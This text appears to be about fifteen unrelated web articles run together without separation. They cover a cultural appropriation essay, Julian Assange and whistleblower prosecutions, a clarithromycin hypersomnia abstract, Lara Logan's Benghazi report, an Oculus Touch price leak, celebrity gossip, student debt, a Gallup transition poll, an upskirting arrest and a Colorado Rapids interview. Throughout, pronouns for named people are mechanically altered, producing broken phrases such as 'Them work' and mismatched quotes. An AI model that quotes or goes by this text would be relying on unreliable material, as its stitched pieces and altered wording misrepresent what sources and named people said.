So there is an unequal exchange between Western culture – an all-consuming mishmash of over-simplified and sellable foreign influences with a dash each of Coke and Pepsi – and marginalized cultures.
People of all cultures wear business suits and collared shirts to survive. But when one is of the dominant culture, adopting the clothing, food, or slang of other cultures has nothing to do with survival.
So as free as people should be to wear whatever hair and clothing they enjoy, using someone else's cultural symbols to satisfy a personal need for self-expression is an exercise in privilege.
Because for those of us who have felt forced and pressured to change the way we look, behave, and speak just to earn enough respect to stay employed and safe, our modes of self-expression are still limited.
African American Vernacular English (AAVE) is consistently treated as lesser than Standard English, but people whitewash black slang and use expressions they barely understand as punch lines, or to make themselves seem cool.
People shirk “ethnic” clothes in corporate culture, but wear bastardized versions of them on Halloween.
There is no exchange, understanding, or respect in such cases – only taking.
What Cultural Exchange Can Look Like
That doesn't mean that cultural exchange never happens, or that we can never partake in one another's cultures. But there needs to be some element of mutual understanding, equality, and respect for it to be a true exchange.
I remember that at my sister's wedding, the groom – who happened to be white – changed midway through the ceremony along with my sister into modern, but fairly traditional, Nigerian clothes.
Even though some family members found it amusing, there was never any undertone of the clothes being treated as a costume or “experience” for a white person to enjoy for a little bit and discard later. They were invited – both as a new family member and a guest – to engage our culture in this way.
If they had been obnoxious about it – treated it as exotic or weird or pretended they now understood what it means to be Nigerian and refused to wear Western clothes ever again – the experience would have been more appropriative.
But instead, they wore them from a place of respect.
That's what cultural exchange can look like – engaging with a culture as a respectful and humble guest, invitation only.
Don't overstay your welcome. Don't pretend to be a part of the household. Don't make yourself out to be an honored guest whom the householders should be grateful to entertain and educate for hours on end.
Don't like ads? Become a supporter and enjoy The Good Men Project ad free
Don't ask a bunch of personal questions or make light of something that's clearly a sore spot. Just act like any polite house guest would by being attentive and knowing your boundaries.
If, instead, you try to approach another culture as a mooch, busybody, or interloper, you will be shown the door. It's that simple.
Well, maybe not as simple when you move beyond the metaphor and into the real world. If you're from a so-called melting pot nation, you know what it is like to be a perpetual couch surfer moving through the domains of many cultures.
Where Defining Cultural Appropriation Gets Messy
Is the Asian fusion takeout I order every week culturally appropriative? Even though I'm Black, is wearing dreadlocks appropriating forms of religious expression that really don't belong to me?
Is meditating cultural appropriation? Is Western yoga appropriation? Is eating a burrito, cosplaying, being truly fascinated by another culture, decorating with Shoji screens, or wearing a headscarf cultural appropriation?
There are so many things that have been chopped up, recolored, and tossed together to make up Western culture that even when we know things are appropriative in some way, we find them hard to let go of.
And then there are the things that have been freely shared by other cultures –Buddhism for example – that have been both respected and bastardized at different turns in the process of exchange.
At times, well-meaning people who struggle with their own appropriative behavior turn to textbooks, online comment boards, Google, and Tumblr ask boxes in search of a clear-cut answer to the question, “Is this [insert pop culture thing, hairstyle, tattoo, or personal behavior here] cultural appropriation?”
Don't like ads? Become a supporter and enjoy The Good Men Project ad free
That's a question we have to educate ourselves enough to, if not answer, think critically about.
We have a responsibility to listen to people of marginalized cultures, understand as much as possible the blatant and subtle ways in which their cultures have been appropriated and exploited, and educate ourselves enough to make informed choices when it comes to engaging with people of other cultures.
So if you're reading this and you're tired of people giving white women wearing bindis crap for appropriating because “freedom of speech,” recognize that pointing out cultural appropriation is not personal.
This isn't a matter of telling people what to wear. It's a matter of telling people that they don't wear things in a vacuum and there are many social and historical implications to treating marginalized cultures like costumes.
AUSTIN, Texas — On Sunday, WikiLeaks founder Julian Assange marked the fourth anniversary of the day they entered the Ecuadorean Embassy in London on asylum.
Many, including fashion designer Vivienne Westwood and philosopher and political analyst Noam Chomsky, voiced their support for Assange and their hopes for their eventual freedom. But Assange is just one of many victims of the U.S. war on whistleblowers, an unprecedented crackdown on government transparency that's unlikely to end any time soon.
Watch “Wikileaks Video Report – ‘First they came for Assange'” from acTVism Munich:
Assange entered the embassy on June 19, 2012 under threat of extradition to Sweden for questioning over allegations of improper sexual behavior toward two women. Swedish officials have refused to guarantee that Assange will not be extradited to a third country, and until recently, they've also refused invitations to question them at the embassy. Though the case against them has weakened over time, Assange still fears they could face decades in prison, or even the death penalty, if they were extradited from Sweden to the U.S., where a secretive, federal grand jury could indict them for hosting classified, leaked information on WikiLeaks.
Although a United Nations panel ruled in February that the conditions of Assange's confinement constitute “arbitrary detainment,” and thus, a violation of their human rights, they remain under constant surveillance and threat of arrest. The Independent reported on Monday that Hugo Swire, a minister with the British foreign office responsible for relations with Latin America, recently met with Guillaime Long, Ecuador's newly appointed foreign minister, to turn up the pressure for a resolution. The Independent quoted Swire as saying:
“We continue to be deeply frustrated by the lack of progress in this case. I personally expressed to Foreign Minister Long my sincere hope that Ecuador will soon facilitate the Swedish Prosecutor's request to interview Mr Assange in the Ecuadorean Embassy in London. It is important that this case is finally brought to a close.”
5 victims of the US war on whistleblowing
Assange's confinement comes amid an atmosphere of unprecedented hostility toward whistleblowers. CBS News' “60 Minutes” reported in 2014 that more government leakers have been prosecuted under President Barack Obama than all previous administrations combined, a trend that is expected to continue through the final days of their administration.
Here are five more victims of the U.S. war on whistleblowers that have been convicted since Assange entered the embassy:
In January 2015, independent journalist Barrett Brown was sentenced to 63 months in prison on multiple counts relating to their sharing of information obtained from the 2012 hack of Strategic Forecasting , a corporate intelligence agency, by the hacktivist collective Anonymous. Their charges include threatening a federal officer, based on an angry video published in the wake of federal agents threatening their mother. Some believe he's been singled out for poor treatment in prison thanks to their continued reporting from behind bars .
Watch “CIA Whistleblower: US Alliance w/ Gulf Monarchies Why MidEast In Crisis w/ Mnar Muhawesh” from MintPress News' “Behind the Headline”:
Clinton & Trump likely to continue prosecuting whistleblowers
Statements about Edward Snowden, the NSA whistleblower, suggest that the war on transparency that began under Obama is likely to continue into the next administration. Snowden, who revealed the widespread surveillance of millions of people, including most American citizens, has lived in Russia under asylum since the U.S. revoked their passport in June 2013.
In an October debate, Hillary Clinton, the presumptive Democratic nominee for president, stressed the need for Snowden to face jail time. “[H]e stole very important information that has unfortunately fallen into a lot of the wrong hands. So I don't think they should be brought home without facing the music,” they said.
Donald Trump, the presumptive Republican nominee, has spoken even more strongly about the whistleblower. Although Snowden laughed it off during a September interview, Al-Jazeera quoted Trump calling for Snowden's death at the hands of the U.S. government:
“This guy's a bad guy. There is still a thing called execution.”
Watch “Chelsea Manning: The US' Forgotten Political Prisoner?” from MintPress News' “Behind the Headline”:
The macrolide antibiotic clarithromycin can enhance central nervous system excitability, possibly by antagonism of GABA-A receptors. Enhancement of GABA signaling has recently been demonstrated in a significant proportion of patients with central nervous system hypersomnias, so we sought to determine whether clarithromycin might provide symptomatic benefit in these patients. We performed a retrospective review of all patients treated with clarithromycin for hypersomnia, in whom cerebrospinal fluid enhanced GABA-A receptor activity in vitro in excess of controls, excluding those with hypocretin deficiency or definite cataplexy. Subjective reports of benefit and objective measures of psychomotor vigilance were collected to assess clarithromycin's effects. Clinical and demographic characteristics were compared in responders and non-responders. In total, 53 patients (38 women, mean age 35.2 (SD 12.8 years)) were prescribed clarithromycin. Of these, 34 (64%) reported improvement in daytime sleepiness, while 10 (19%) did not tolerate its side effects, and nine (17%) found it tolerable but without symptomatic benefit. In those who reported subjective benefit, objective corroboration of improved vigilance was evident on the psychomotor vigilance task. Twenty patients (38%) elected to continue clarithromycin therapy. Clarithromycin responders were significantly younger than non-responders. Clarithromycin may be useful in the treatment of hypersomnia associated with enhancement of GABA-A receptor function. Further evaluation of this novel therapy is needed.
© The Author(s) 2013.
Eleven years ago, the 60 Minutes correspondent Lara Logan was sitting in the InterContinental hotel in Amman, Jordan, watching their career flash before their eyes.
They were 31 years old, a rookie at CBS News, assigned to cover the biggest story on earth: the invasion of Iraq. But nothing was going as planned. With only days until the American invasion, Logan had been forced to leave Baghdad and was desperate to get back before the war began, but they and their crew, because of the dangers of the imminent shock and awe bombing campaign, were forbidden from going by the network. That's when they heard about a convoy of French reporters making the trek to Baghdad.
She called me several times, begging to go with us, recalls Laura Haim, a French TV journalist. But the French decided it was too dangerous having an American broadcaster onboard, even if they were South African. I said, No way.'  Fluent in three foreign languages, Logan begged in French.
Logan had labored tirelessly for this chance, spending several months in Kabul during the invasion of Afghanistan and heedlessly throwing themselves into danger for the camera to deliver raw reportage to the CBS Evening News and 60 Minutes II, the spinoff version of the Sunday program. Them work had earned their notice at the highest levels of the network. CBS chairperson and CEO Leslie Moonves, from their perch in Los Angeles, viewed their steely eyes, breathless delivery, and exotic accent as the raw material of a future star. So Logan had strategized with their agent to make the biggest possible splash in Baghdada replay of Christiane Amanpour's star turn at CNN during the first Gulf War.
Days later, as American bombs rained down on Iraq, the French reporter was startled to see Lara Logan standing in the lobby of the Palestine Hotel in Baghdad. Look, I made it! they declared.
Two Iraqi fixers had smuggled them across the border, making them the only major American network-TV staff broadcaster in the country when the war began. I was really impressed by their courage, says Haim. It was not bullshit. They really wanted to do things to make a name.
Logan was launched. They became chief foreign correspondent in only three years and a top correspondent on 60 Minutes two years after that.
But last fall, after a deeply flawed 60 Minutes report on the attack in Benghazi, Libya, the trajectory of their career, along with that of CBS's flagship news show, changed abruptly.
Logan and 60 Minutes had been searching for a new angle on the Benghazi story for the better part of a year, and finally one seemed to arrive. The break in the story came from a hulking, goateed former military contractor who called themselves Morgan Jones. Jones, whose real name is Dylan Davies, told Logan an emotional tale of witnessing the attack firsthandclimbing an embassy wall in order to engage the combatants, then stepping into the breach as Washington dithered. Relentlessly hyped in the days leading up to the broadcast, the story fit broadly into the narrative the right had been trying for months to build of a White House and State Department oblivious to the dangers of Al Qaeda, feckless in their treatment of their soldiers and diplomats, then covering up their incompetence. It was soon revealed to be made up almost of whole cloth. Davies, who worked for a security firm called Blue Mountain, had invented the story to sell a book. For 60 Minutes and Logan, it was a stunning error, of a sort that can quickly corrode the brand of a show like 60 Minutes. And the scandal was an oddly precise echo of Rathergate, when Dan Rather, at the Wednesday edition of 60 Minutes in 2004, used memos of dubious provenance in a report on George W. Bush's Texas Air National Guard service.
In the aftermath of the Benghazi report, the problems with its sourcing were glaring, the kind that should have raised red flags. Logan's interview subject happened to be selling a book on a politically conservative imprint owned by CBS News's own parent company.
After defending the report for more than a week, Logan was forced to apologize and later take an indefinite leave of absence while CBS conducted an internal inquiry. Them colleagues, including veteran CBS correspondents Steve Kroft and Bob Simon, were apoplectic about the damage to 60 Minutes' reputation. Morley Safer, the only founding member of the cast left on the 45-year-old program, went into the office of CBS News chairperson and 60 Minutes executive producer Jeff Fager's office last fall and demanded that they fire Logan.
But Fager (who declined to comment for this story) refused. Instead, they said that Logan will return sometime this year. Their decision sent a ripple of discontent through CBS News, prompting questions about Fager's judgment. And as the months have rolled on, Logan's return appears less and less certain.
(c)Oculus
German consumer electronics retailer Media Markt has published details of a launch date and price for Oculus' Touch controllers - before removing the details from its web page.
Luckily, VRTech grabbed a screenshot of the page, which states that controllers will be about €199 and be available from 21 November.
It's yet unknown whether these details are correct, as the page has now been edited, but it's a likely date and price for the hardware which Oculus fans have been waiting nearly a year for.
Back in December 2015, Oculus wrote in a blog post that it would delay shipment of the Touch controllers so it could make improvements to them. It wrote that it would launch the controllers in the second half of this year and would release “a huge amount of ground-breaking new content” alongside them - including 30 of these titles.
While it received plenty of comments - including on the blog itself - that were of the mixed reaction variety, the delay may have given the HTC Vive some leeway to get ahead of them as the company already had their version of the touch controllers ready to ship with the headset.
However, some hardcore fans commented beneath Oculus 2015 announcement that they were happy to wait a bit longer “if it means a better product”.
So far Oculus has been pretty quiet about the controllers' launch date and price, and other typical retailers such as GAME and Amazon seem to have no mention of it on their sites.
To be fair, Oculus has been promoting new Touch content such as Carnival Games and Blind at PAX West 2016 along with the controllers, meaning they aren't too far away from being launched, we reckon.
Interested in hearing industry leaders discuss subjects like this and sharing their use-cases? Attend the co-located IoT Tech Expo, Blockchain Expo, AI & Big Data Expo and Cybersecurity & Cloud Expo World Series with upcoming events in Silicon Valley, London and Amsterdam and explore the future of enterprise technology.
PenHero Quarterly Q1 2017 is now available for purchase!
by Jim Mamoulides, May 19, 2017
PenHero Quarterly Q1 2017 front cover
Click the image above to see a full screen slideshow
Now available for purchase on Amazon.com - click this link!
Now available for purchase on Lulu.com - click this link!
PenHero Quarterly features a new pen every day! Written and photographed by Jim Mamoulides of PenHero.com, the 100 page 8.5x11 inch perfect bound paperback book features 90 full color pages, each with large photos, including a history and description of some of the most unusual and valuable pens in the world.
PenHero Quarterly Q1 2017 back cover
Each of the 90 pages includes a new pen to discover and learn about, with a large full color photo and history. One pen for every day of the quarter. Some of the pens are quite rare, some are highly sought after, some have interesting discoveries. Learn something new every day!
PenHero Quarterly Q1 2017 table of contents
PenHero Quarterly features pens from the United States, United Kingdom, Japan, Italy, Germany and China.
PenHero Quarterly Q1 2017 sample page
Featured manufacturers:
Classic Pens / Lambrou Pens
Mabie Todd Swan Visofil V Series
Japanese tsui-shu kamakura bori art pens
Marukin hard rubber eyedropper pens
Yotsubishi
Shoukei custom carved Japanese fountain pens
Pelikan M1000
Moore Fingertip
Platinum
Wahl Eversharp
Cross
Cleo Skribent
Aurora
John Holland
Waterman
Wearever
Parker
Sheaffer
PenHero Quarterly Q1 2017 sample page
Includes a brief history of each manufacturer and a glossary of special terms. Pen collecting is the one hobby where the object of the collection is also a creative tool that can express a spectrum of ideas, imagination, and emotions.
Sample pages
PenHero Quarterly Q1 2017 sample page
PenHero Quarterly Q1 2017 sample page
PenHero Quarterly Q1 2017 sample page
PenHero Quarterly Q1 2017 sample page
PenHero Quarterly Q1 2017 sample page
PenHero Quarterly Q1 2017 sample page
PenHero Quarterly Q1 2017 sample page
PenHero Quarterly Q1 2017 sample page
Does George Clooney have an Amal Problem?
My jaw dropped Sunday night as funny ladies Amy Poehler and Tina Fey took the stage at the Golden Globes and Fey lit into Amal Alamuddin Clooney, the stylish and accomplished new bride of actor, producer, director, screenwriter and Tinseltown heartthrob George Clooney — a k a “Amal's husband.” (Or, in some circles, “the next president of the United States.”)
“Amal is a human rights lawyer who worked on the Enron case, was an adviser to Kofi Annan regarding Syria, and was selected for a three-person commission investigating rules of war violations in the Gaza Strip,” Fey said. “So tonight, their husband is getting a lifetime achievement award.”
Huh?
The line seems to have gone over the heads of those in the media obsessed over “whom” they were wearing (Dior). Also drawing the kind of interest formerly reserved for the cellphone numbers of Leonardo DiCaprio's posse of scantily clad babes were the baggy, white, elbow-length gloves they rocked like a poor woman's Jackie Kennedy. The gloves drew the scorn of new “Fashion Police” host Kathy Griffin, who, replacing the late Joan Rivers, deemed Mrs. Clooney, 36, the worst-dressed Golden Globes attendee.
“I thought it was weird they had those gloves that remind me of, like, a porn scene where the guy goes home and there's the naughty dishwasher and they only has the gloves,” Griffin quipped about the accessories favored by the Lebanese-British barrister who speaks English, Arabic and French and bears a degree from Oxford University. “Like, they used those bovine-insemination gloves to rake through their hair instead of a brush.” Ouch.
But Fey's assertion that the woman who married George Clooney, 53, in September had been selected to serve on a commission investigating war crimes in Gaza, allegedly committed by Israeli forces, caused me to gasp. Didn't they refuse the assignment?
Fey's publicist told me that the comedian was just making a joke at George Clooney's expense, but would not say why Fey chose to go there. A rep for Poehler did not respond to my email, and George Clooney's publicist said they passed my questions on to the missus, who did not get back to me.
Here is the story: The UN Human Rights Council announced in August that the then-Ms. Alamuddin, engaged to Clooney at the time, would serve on a panel, one that Israeli leaders have likened to a “witch hunt” whose members are bent on penalizing Israel for acting in self-defense against Palestinian rocket attacks. Then Alamuddin declared they would skip serving on the panel because they were too busy with eight legal cases. But they released a statement that revealed their antipathy toward the Jewish state:
“I am horrified by the situation in the occupied Gaza Strip, particularly the civilian casualties that have been caused, and strongly believe that there should be an independent investigation and accountability for crimes that have been committed,” it read.
I believe that their refusal to join the anti-Israel commission was an effort not to antagonize their then-fiancé's Hollywood colleagues, many of whom are pro-Israel and/or Jewish. But as Clooney cements their political résumé, bringing their activism against African genocide to their good friend President Obama while they campaign against global warming, political types are urging Amal's husband to run for office.
George Clooney, a lifelong liberal, has batted away overtures from members of California's Democratic Party, who've asked them to seek office. “I f- -ked too many chicks and did too many drugs, and that's the truth,” they told Newsweek magazine in 2011.
But after they got hitched, British bookmaker William Hill lowered the odds that George Clooney would someday serve as president from 200 to 1 to 100 to 1. “George Clooney is not just one of the most recognizable faces in the USA, but in the world, and if they did decide to run for president, they tick a lot of boxes,” said a spokesperson for Hill, who gave 20-to-1 odds that Clooney would seek the presidency in 2016, and 500-to-1 odds that he'd win the race. The online wagering service Bovada has started taking bets on the chances of Clooney winning the White House next time around, setting the odds at 500 to 1.
Will they do it?
It's unclear if George Clooney possesses the will, or the power, to fix their female trouble.
Red, white and boo to Hollywood
Schizo Hollywood is split over patriotism. In the Oscar nominations announced Thursday, the film “Unbroken,'' about American Olympian and World War II hero Louis Zamperini, was all but snubbed, earning noms only in the unsexy categories of Cinematography, Sound Editing and Sound Mixing.
The film's director, Angelina Jolie, a source told The Post, was already “hurt'' and “upset'' that the flick was overlooked for Golden Globe honors.
But “American Sniper,'' a film about a Navy SEAL assassin that was also shut out at the Globes, was nominated for a Best Picture Oscar and star Bradley Cooper is in contention for Best Actor. The movie also scored noms in lesser categories, including Sound Mixing and Sound Editing, pitting it against “Unbroken.''
But It's director, Clint Eastwood, was ignored for a Best Director nomination. So was Ben Affleck, who helmed 2012's “Argo,'' as well as Kathryn Bigelow, denied a nom for directing “Zero Dark Thirty'' — both pro-American films — though “Argo'' won a Best Picture statue.
Tinseltown has a problem with movies that honor God and country. I have a problem paying to see the dreck offered by the studios.
Curry picks themselves back up
They were the victim of a televised snuffing. More than two years ago, Ann Curry was dumped from the “Today'' show, apparently at the behest of co-host Matt Lauer (though some NBC News insiders deny this).
Curry, 58, who stopped speaking to Lauer, 57, got tired of doing almost nothing at a network that paid them a reported $12 million a year and gave them the fancy title of national and international correspondent / “Today'' show anchor-at-large. The brass agreed.
Now she's starting their own production company that will sell shows to, among other outlets, NBC, Emily Smith of The Post's Page Six first reported.
I wish Curry well. Lauer, not so much.
Our ‘splitting' headache
If you've been hanging on to your marriage, now might be the time to let it go.
January brings a one-third increase in divorce filings over other months of the year because people tend to stay wed to their spouses through the holidays, then give them up, according to RPG-Life Transition Specialists.
Folks at the wealth management firm warn Americans to prepare for the potentially crushing economic toll that splitting up can cause.
But what about love and commitment?
In this easy-divorce culture, those things aren't important.
The aggressive growth in student debt is setting the country up for another debt fueled bubble. Higher education costs have expanded so quickly that Americans now carry $1 trillion of student debt. Most of this expansion has occurred in a time when the return-on-investment for a college degree has fallen. Over the last ten years student debt outstanding has grown from less than $300 billion in 2002 to $1 trillion in 2012. The cracks in the student loan bubble are already forming with large numbers of students defaulting on their loans. And the pipeline is only increasing. Almost half of all student borrowers are not making payments. Many are in school and many are simply unable to pay. Yet with a weak economy the prospect increases that many younger Americans are going to enter a market where job growth is weak yet student debt payments are high.
The massive growth of student loans and tuition
The issue is that college tuition even at public universities has far outpaced the growth of the overall CPI. College earnings for recent graduates, those who left school in the last decade, has been marginal since many younger Americans are carrying a big load of this recession:
Source: Sober Look, Barclays Capital
Higher debts and lower wages. The risks do run high because many younger Americans are now going to college at far greater rates:
Before saying how great this is thought of the millions enrolled in for-profit paper mills that are basically giving you a piece of paper for tens of thousands of dollars. The risks are getting large and larger. The debt explosion has far outpaced the growth rates of any industry including the insane housing market. Even in a decade where US households went debt crazy, student debt growth went on a separate and even more insane path:
A large part of the growth has happened in the last decade when many young Americans are opting to go to college. Yet are they doing this modestly with degrees that have some value in the marketplace? College of course goes beyond the degree you get and many argue there is a signaling impact as well. Yet the market is speaking otherwise. And with college costs at many private 4-years institutions at $50,000 a year you better ask what the return of your degree is going to be. Much of the debt is being taken on by the young:
Of the $85 billion in past due student debt, over 66 percent comes from those 39 and younger. Some of the more troubling aspects:
“(SoberLook) Barclays Capital: – The Federal Reserve, with the help of Equifax, created an extensive data set providing a snapshot of student debt in Q3 2011 that was released in March 2012. According to this study, 14% of all borrowers had past-due balances, and 27% of those who had entered the repayment cycle had past-due balances. Almost half of all student borrowers were not making payments; 47% were either still in school or in deferral, forbearance, or grace periods as of Q3 2011. This means that a significant number of borrowers who are not currently in repayment are set to enter the payment cycle in the next few years. Given the weak labor market and increasing dropout rates, there is little reason to think that their delinquency rates will lower the current national average.”
Just another bubble gearing up to burst in the debt machine we know as our higher education system.
If you enjoyed this post click here to subscribe to a complete feed and stay up to date with today's challenging market!
A majority of people in the U.S. say they disapprove of President-elect Donald Trump's transition to the White House, according to a new Gallup poll.
The poll, released last Friday, found 51 percent of people disapprove of the transition while 44 percent said they approve of it.
President Obama's approval, before they took office in January 2009, was 83 percent, Gallup said, with only 12 percent disapproving. Approval for President George W. Bush in January 2001 was 61 percent, with 25 percent disapproving. Gallup said approval for President Bill Clinton in January 1993 stood at 68 percent, with 18 percent disapproving.
Gallup noted that Mr. Trump's 48 percent transition approval rating from December was the lowest for any presidential transition in its polling history.
The latest survey found that 52 percent said Mr. Trump's choices for their Cabinet are “average” or better and 32 percent of that group rate them as “above average” or “outstanding.” Forty-four percent, on the other hand, said their picks are “below average” or “poor.”
The poll was released a week before Mr. Trump's inauguration this Friday.
The survey polled 1,032 adults between Jan. 4 and 8 with a 4 percentage point margin of error.
The Kootenai County sheriff says he's prepared to cut off their department's sponsorship of a Boy Scouts of America troop because they believe that the BSA's decision to accept gay scouts promotes a lifestyle that contradicts Idaho state law.
This morning's Coeur d'Alene Press reports that Kootenai County Sheriff Ben Wolfinger has already talked to an official with the Inland Northwest Council of Boy Scouts about the matter.
"This just opens the door to having openly gay scout leaders," Wolfinger told the Press.
But Tim McCandless, CEO of the Inland Northwest Council, told the Press that they wanted to talk with the sheriff about their interpretation of the policy change, which Wolfinger maintains promotes sodomy—a crime under Idaho statute.
"I would encourage you to read the resolution that was passed, however," said McCandless. "Sodomy is not allowed in scouting and is not an issue in this discussion."
McCandless added that they believed "good people can disagree and still work together to accomplish great things for youth."
The policy, which takes effect Saturday, June 1, was approved by 61 percent of voting members at the week's annual meeting of the Boy Scouts of America National Council.
I wondered last week why the $825 billion House stimulus bill gave the short end of the stick to mass transit, despite vows from President Obama and other Dems to wean the country off its obsession with gas-guzzling car travel. After all, the House bill contains only $10 billion for transit compared with $30 billion for road-building — a $20 billion-plus cut from the infrastructure stimulus proposal put forth last month by Rep. Jim Oberstar (D-MN), chairperson of the House transportation panel.
It looks like Oberstar themselves shed some more light on the question two days ago, while Washington was in the thick of inauguration fever. In a speech to the U.S. Conference of Mayors, Oberstar explained why ground-breaking infrastructure projects got sliced: to make room for tax cuts. Here's how they put it:
That is why we set forth this $85-billion initiative from our committee. It's been reduced in the final going. We expect that it'll come out somewhere around $63 billion, but $30 billion for highways. The reason for the reduction in overall funding — we took money out of Amtrak and out of aviation; we took money out of the Corps of Engineers, reduced the water infrastructure program, the drinking water and the wastewater treatment facilities and sewer lines, reduced that from $14 billion to roughly $9 billion — was the tax cut initiative that had to be paid for in some way by keeping the entire package in the range of $850 billion. But I'll say that our portion is the one that really creates the jobs. Our portion of it is the one that's going to put people to work because unlike anything else, these jobs can't be outsourced to Bangalore, India.
Trading high-speed rail for more tax cuts? Hmmm …
Distinguished NSE Alums Turnage, Coxe and Rothrock Illuminate The Business Side of Nuclear Technology
Virtually all engineers want to make a positive impact on society. Technical knowledge is necessary for achieving this goal, but not sufficient, especially in a field like nuclear engineering, where broad economic, political, and business issues are intimately entwined with the technology.
Students in NSE department head Richard Lester's Managing Nuclear Technology class recently got a high-level perspective on these aspects of technology leadership at first-hand in guest lectures by three distinguished NSE alumni – senior utility executive Joe Turnage (SM '70, Ph.D. '72), consultant Ray Coxe (BS, '82, Ph.D. '88), and venture capitalist Ray Rothrock (SM '78).
The three men offered informative insights into their work, and provided clear evidence of the perseverance and creativity needed to bring good ideas to fruition. An especially helpful aspect was their sharing of spreadsheets, project management charts, presentations, and other tools used to evaluate projects ranging from power plants to infrastructure upgrades to startups.
Seeing these types of numbers was "absolutely helpful – it put together in a very concrete sense the theory of what we've learned with the cost accounting," commented masters' student Russell Rodewald.
A recurring theme of the talks was the evaluation of risk, which bears heavily on financial aspects of new endeavors. "Every project has risk, it's unavoidable," said Coxe, whose consultancy specializes in energy infrastructure project development. "Risk means a higher cost to somebody. Some risks are well-apportioned, some are not, and that can sink a project."
Coxe emphasized the central importance of the pro forma – a spreadsheet-based financial model with hundreds of inputs that attempts to quantify every dollar that will go into and out of a given project over its lifetime (up to 60 years in the energy sector). While the pro forma has huge value in assessing the viability of an investment, they added, "risk evaluation is as much art as science…you can't capture the unexpected, and there are cognitive limits with uncertainty. Perceptions and emotions play a large role, and risk tolerance is not absolute."
The fickleness of analysis figured into the talk by Turnage, senior VP of Constellation Energy's Nuclear Group, and senior VP for strategy at UniStar Nuclear Energy, a separate entity seeking to build several new nuclear power plants in the US, including one in Maryland.
That project has stalled, not because of technical, regulatory or community issues, but from assumptions used by the federal Office of Management and Budget to assess the risk (and therefore the price) of federal loan guarantees. Turnage called the guarantee program, authorized under the 2005 Energy Policy Act, "an important bridge policy for resurrecting the US nuclear industry." But despite that act of Congress, support from the Department of Energy, and enthusiastic Presidential-level backing, OMB's pricing of the loan guarantees was several times what UniStar and its investors had expected, derailing the entire effort. "There's a big gap between energy policy and implementation," said Turnage, who said their team is actively working on "Plan B."
Rothrock, a longtime venture capitalist at Venrock, offered an investor's perspective on risk, noting that on average, three of ten VC investments wipe out and four break even, and only one in ten or one in twenty becomes a "home run" with 10x or more return. Like the others, Rothrock counseled patience, saying, "I'm usually involved for eight to 10 years, because it takes that long to build something, learn how to sell it, and get the distribution going."
They noted that charisma, vision, and salespersonship are essential for the substantial number of aspiring entrepreneurs in the class. Rothrock urged attention to broad macro trends, because "large markets cover mistakes." and added compelling advice for the class on pitching a new business idea to investors.
"If you get invited to present, do your homework – know who you're in front of, where they came from, know their dogs' names, everything about them," said Rothrock. "You get 45 minutes, and it can be very magical. Make it a short story. Give a customer example, say what motivated you to take this project on. Describe the solution, the product of science. Why are you special, why can you do it? And never forget – you have to ask for the order. If you're not going to ask me, you won't ask a customer."
Reviews among the students were extremely favorable. "The series was fantastic," commented one SM student. "One of the greatest challenges is that you can't just say, here's a new technology – the real question is, can you do it economically, in a way that makes it society's choice? If your technology doesn't get built, you can't have the real-world impact you hope for."
Please enable Javascript to watch this video
HENRICO, Va. -- Police said they arrested a man who was trying to snap pictures under women's skirts at the Wal-Mart in Short Pump.
Henrico Police said that one victim became very uneasy when the man bumped into them in the middle of the store and pretended to drop something. They said 55-year-old John Alexander Wiggins violated two women by using their smart phone to snap pictures under their skirts.
A woman who suspected Wiggins was up skirting alerted their husband, who police said followed the man around the store. They allegedly watched Wiggins do it again to an unsuspecting shopper.
Managers and police were called. Wiggins was arrested outside of the store.
Customers were surprised by their “bold actions.”
Neighbors in the suspect's Wyndham community were also stunned, including the one who lives across the street.
“Takes care of their family, he's got three daughters,” said neighbor Tim Vicari. “He's been here as long as we have, we've been here for 19 years -- I think he's been here just as long – I'm very surprised by that (the news).”
Police said during their arrest Wiggins made statements that led them to believe they were a danger to himself.
Law enforcement then made sure that Wiggins was later provided mental health services.
 They are now making their way through the legal system.
"I would like to think that something strange has gone on because like I said they are a quiet man, keeps to himself, very stunned by that news,” Vicari said.
“Very helpful guy, friendly, quiet, never any trouble,” Vicari added. “I feel bad for their wife.”
Court records show that Wiggins faces two misdemeanor counts of creating an unlawful image on another.  They are expected in court July 26.
COMMERCE CITY, Colo. – Where do the Colorado Rapids go from here? A year after their surprise MLS Cup championship, they're without a coach and under new management, respectively, with Gary Smith and Jeff Plush both gone.
Under Smith, the Rapids finished with a 12-9-13 record this past season, good for fifth place in the Western Conference despite a litany of injuries and fixture congestion from the team's first foray into the CONCACAF Champions League.
With no new head coach yet appointed, MLSsoccer.com spoke with technical director Paul Bravo (above, right) to get their take on what happened in 2011 and what's next for Colorado.
MLSsoccer.com: Why were the Rapids unable to successfully defend their 2010 MLS Cup?
Bravo: We failed to get any consistency from a results perspective. In terms of performance indicators, we were down in all categories compared with 2010, things like goals scored, shots created, possession. There were injuries and suspensions, but the players were the ones who led by example when it came to that stuff. We have to respect the effort given by the players. We have a great group of guys and they never made any excuses; they just got on with playing.
MLSsoccer.com: What were some of the positives you take away from 2011?
Bravo: We needed to add depth to the group and all that needed to be managed. There were some additions to the group that helped. We felt that Tyrone Marshall brought some veteran leadership to the group, Sanna Nyassi showed well when they were up top and Caleb Folan showed some glimpses of talent.
But the real positives were the performance of Jeff Larentowicz, Drew Moor showing their versatility and ironman status. They and Marvell Wynne are a tandem with real upside. And then, some of the younger players: Andre Akpan and Quincy Amarikwa made some significant strides and we have high hopes for Eddie Ababio. We also continue to see a lot of potential in Anthony Wallace.
MLSsoccer.com: When will a head coach be named? Will they come from within MLS?
Bravo: There is no set timetable, but it should be before the first of the year. We have to find the best fit for the club. We feel that we need to find a person who has working knowledge of league rules, someone who understands the draft process and also the link between the business and playing side.
MLSsoccer.com: Is there likely to be a major overhaul of the roster?
Bravo: There is no need for an overhaul. We are in a good spot with all of the core guys. Matt Pickens, Marv, Drew, Jeff, Pablo Mastroeni, Conor Casey, Omar Cummings, Brian Mullan and Kosuke Kimura, plus a couple of other players. All these players came through the college system. These are the same players who helped us win MLS Cup and we have a vision that very much includes this group.
MLSsoccer.com: What spots on the roster do you feel you need to address, and where might new players come from?
Bravo: There is an imbalance in the group. We don't have a whole lot of left-sided players and we maybe have too many forwards. We do need to find competition for Wallace in the left back position. We don't have many left-footed midfielders and we want to try and find that creative difference-maker. That is something we have not made a priority of in recent years. South American players have always had a great deal of success in our league and this remains an area of the world that needs to be combed.
MLSsoccer.com: With so much change this offseason, what are the reachable goals in 2012 that will get the team going back in the right direction?
Bravo: We must be committed to challenging for every trophy. Just making the playoffs isn't good enough. We should be talking about challenging for the Supporters' Shield and the US Open Cup and that is a culture we have not had around here. We have to be a club that aspires to win every trophy, including the Champions League when we get back into that.
